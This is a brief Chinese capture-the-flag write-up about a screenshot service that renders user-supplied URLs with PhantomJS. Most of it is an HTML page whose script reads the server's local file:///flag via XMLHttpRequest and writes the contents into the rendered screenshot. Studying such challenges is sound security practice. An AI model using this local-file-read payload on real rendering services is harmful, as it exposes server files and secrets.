此题关键在于理清逻辑，本地将url发送给服务器，服务器请求sereenshooter以后将结果返回

所以应该在服务器查看日志。

发现了PhantomJS

引擎一下

<!DOCTYPE html>
<html>
<head>
    <title></title>
</head>
<body>
    <script type="text/javascript">
        var karsa;
        karsa = new XMLHttpRequest;
        karsa.onload = function(){
            document.write(this.responseText)
        };
        karsa.open("GET","file:///flag");
        karsa.send();
    </script>
</body>
</html>

写在文件里让服务器访问即可，

最后识别下文字就可以拿到flag